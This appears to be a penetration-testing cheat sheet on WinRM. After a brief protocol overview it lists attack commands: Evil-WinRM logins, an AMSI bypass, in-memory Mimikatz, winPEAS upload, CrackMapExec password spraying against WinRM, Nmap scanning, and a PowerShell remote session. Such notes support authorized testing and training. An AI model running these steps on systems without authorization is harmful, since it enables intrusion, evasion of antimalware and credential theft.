# WinRM ## ABOUT **Windows Remote Management (WinRM)** is a simple Windows integrated **remote management protocol** **based on the command line**. WinRM uses the **Simple Object Access Protocol (SOAP)** to establish connections to remote hosts and their applications. WinRM relies on TCP ports `5985` and `5986` for communication, with the last port `5986` using HTTPS. Services like remote sessions using PowerShell and event log merging require WinRM. ## Evil-WinRM ```bash evil-winrm -i 13.13.13.13 -u venator17 -p password123 ``` > use `menu` to see evil-winrm's commands and loaded scripts > Before loading any script or executable we will need to bypass Antimalware Scan Interface (AMSI). We can do it by using `Bypass-4MSI` command, which patches it. ### Load Scripts ```powershell evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is location of scripts Bypass-4MSI # Bypassing AMSI Invoke-Mimikatz.ps1 # Loading it into memoryu Invoke-Mimikatz # Executing ``` ### Loading Executables ```powershell evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is location of executables Invoke-Binary /opt/executables/winPEAS.exe ``` ### Loading Files > You can upload files only from directory you executed evil-winrm ```powershell upload /opt/executables/winPEAS.exe ./winPEAS.exe ``` ## Nmap WinRM ```bash nmap -sV -sC 13.13.13.13 -p5985,5986 --disable-arp-ping -n ``` ## CrackMapExec ```bash crackmapexec winrm 13.13.13.13 -u user.list -p password ``` ## PowerShell ```powershell PS C:\> $password = ConvertTo-SecureString "password123" -AsPlainText -Force PS C:\> $cred = new-object System.Management.Automation.PSCredential ("MILITECH\sreed", $password) PS C:\> Enter-PSSession -ComputerName MILITECH-MS13 -Credential $cred ``` ## RESOURCES {% embed url="" %}